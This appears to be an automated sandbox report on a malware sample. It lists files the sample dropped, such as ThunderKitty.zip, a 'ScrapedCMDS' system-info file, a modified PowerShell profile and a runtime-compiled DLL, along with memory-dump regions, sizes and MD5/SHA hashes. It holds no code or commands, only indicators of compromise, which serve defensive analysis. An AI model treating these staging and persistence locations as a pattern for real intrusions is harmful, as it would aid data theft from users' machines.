e6c1e30c06796620239d99053d23d120f2a753d35e40d6896e1853a56d8ca1a31dee02cea38268d15f0d2f28bc048f58f1ef89763bf51aff42071ecc0c9ca8d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4a495607a87fc22315c4772bb3b082ed

SHA1
95ebec67fecc754ec383b95065f1b2d785e4d760

SHA256
497b17fa5d57785bb4bd962b65a6e5a3b47f8ba3c028ea3cbb0c68d25e136bb4

SHA512
3d2c5e329abecb22b80c20bba027c9f6ccb2108b05430d5ec62aeb45adc33c72b3899b3239f3acf8755958b11781fc3e901df73dc6f219995693785a5c31f608

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
64fbf4bbcb782fc715cdb5289f6b7bd2

SHA1
22eb16ffd4f71b802e4115ad509eddb31c751595

SHA256
db0bdb82a46e5e2700cff0f4ee424352c17e9f0d89fc1c62d76ea9c00ba9c4c3

SHA512
748b89098e44e33720b751268bc87fdb486e17caa1e5099e3bd465e7452961a029f5b83382f2db7501adc1baf3981f1b5582812244d77ae058ecb77e53d11c5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7D00.tmp

Filesize
1KB

MD5
b3cea97a15076c4b23eb4fac4ec1f591

SHA1
66611f8505a90e706826bba3d53a1c8c247b8844

SHA256
84c08f16fb35e3a84dd17e451ed2d68f49e924148f8b5089741b8a8d3df8b31c

SHA512
7e84ba102d295274bce5786383bba9a2c3abac1d6cfb63c7dcbad466db20efef2d32fbf710802c978b6c0d8a57a84beda26a0c50c7ffdb886f168a124b22b6fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
105KB

MD5
c871f46480d02bf05301a9a480f6c478

SHA1
3615fc7d76c772fbe23302ac152a4a36907d6250

SHA256
e59b3d3266143e0654acd2a863ab8f6dd8839441dc97c0280048891dc770ea00

SHA512
4a5c67b9a353c60ff34ee3154fc56c094c12e0ec247f07a1146585f2770c3c0a9f20ccc11c593b72fde9bb9a68910641e65276e93a4c92351febafe18255945b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
26KB

MD5
e9cc7d973b1d01621d0120c668912bbc

SHA1
787b47147ade9a79c16236c9587580f4685306d2

SHA256
cb8d53db3cfa98f90ea71e85cb859d7464225da2d5ba6684f00fea34279b49bd

SHA512
272f9c78e81e6ae164311f6d9a622a14246f9a4929693eb9b922cc88407d28881cc74fe0eaadbdff4539f63af5b6ea5eaa627650b717ab5ebda4f3abb9acf39f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_23o1ygzd.3jx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\elzdmbqi\elzdmbqi.dll

Filesize
4KB

MD5
fb27f85aac6354b125fd51b989902ba2

SHA1
0fb8ea9aac9cad2db9fcc76d60f65e224e89d457

SHA256
54387feaf1e90eef1217f1caa1ad0b27bfe0a3740513ff902c4342ab4db3ca2e

SHA512
0094f7dd15b24611164ebfbcee86144e934c09f67655e56cd21c0784c8ce77e81af6f4912ddefa676c6968390cf3bf6b83ecc113df5808c2d8662e95a4b98586

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\elzdmbqi\CSC24EAEF18646A4C07A2801F66A06B31A6.TMP

Filesize
652B

MD5
593e1c19b8de579ab6510740eb51a782

SHA1
16a95a9f8fdb9726e6b1c86e2ad0f405f8be54b1

SHA256
1bcb551f84b06d84ec950e34f5030d3a9b2d44a4a9dbddacafa862319b223a14

SHA512
b9a1b548b849cb5193283271af9c51acf195595796bb52c76eebcdf976e8ef94b265ec3c4706e492608f5283e4db47ad03e57a9b9a71309704837fd6a7e1c22d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\elzdmbqi\elzdmbqi.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\elzdmbqi\elzdmbqi.cmdline

Filesize
369B

MD5
573a427fbd79e55ea0d4fb4d12b6d3a6

SHA1
8a278b15078175bd991a49b3ba3cb97a8d41329e

SHA256
126aee4df81a6e653acfb49b3af133e3214bbb83c1239e9324e65ef475676347

SHA512
ade31e582d052cf6ff174b89d6f3edb7c52264e6c607a2613d5ba871c1a5592fd314bb5b5be655325f87535b150eb3b9c8f8ba7489483b873c21ec99f3353f4e

Download Submit
memory/412-81-0x00000138AE600000-0x00000138AE62A000-memory.dmp

Filesize
168KB

Download
memory/412-127-0x00000138ADBC0000-0x00000138ADDDC000-memory.dmp

Filesize
2.1MB

Download
memory/412-118-0x00000138AE5E0000-0x00000138AE5EA000-memory.dmp

Filesize
40KB

Download
memory/412-67-0x0000013893520000-0x0000013893528000-memory.dmp

Filesize
32KB

Download
memory/412-117-0x00000138AE5F0000-0x00000138AE602000-memory.dmp

Filesize
72KB

Download
memory/412-82-0x00000138AE600000-0x00000138AE624000-memory.dmp

Filesize
144KB

Download
memory/2144-85-0x000001E1CFA90000-0x000001E1CFCAC000-memory.dmp

Filesize
2.1MB

Download
memory/2336-0-0x00007FFF77B13000-0x00007FFF77B15000-memory.dmp

Filesize
8KB

Download
memory/2336-13-0x00007FFF77B10000-0x00007FFF785D1000-memory.dmp

Filesize
10.8MB

Download
memory/2336-47-0x0000025538410000-0x000002553862C000-memory.dmp

Filesize
2.1MB

Download
memory/2336-12-0x0000025538730000-0x0000025538752000-memory.dmp

Filesize
136KB

Download
memory/2336-49-0x00007FFF77B10000-0x00007FFF785D1000-memory.dmp

Filesize
10.8MB

Download
memory/2336-10-0x00007FFF77B10000-0x00007FFF785D1000-memory.dmp

Filesize
10.8MB

Download
memory/2820-77-0x00007FFF77B10000-0x00007FFF785D1000-memory.dmp

Filesize
10.8MB

Download
memory/2820-76-0x000001C04F3E0000-0x000001C04F5FC000-memory.dmp

Filesize
2.1MB

Download
memory/2820-23-0x00007FFF77B10000-0x00007FFF785D1000-memory.dmp

Filesize
10.8MB

Download
memory/2820-33-0x00007FFF77B10000-0x00007FFF785D1000-memory.dmp

Filesize
10.8MB

Download
memory/2820-71-0x000001C0503E0000-0x000001C050B86000-memory.dmp

Filesize
7.6MB

Download
memory/2820-34-0x00007FFF77B10000-0x00007FFF785D1000-memory.dmp

Filesize
10.8MB

Download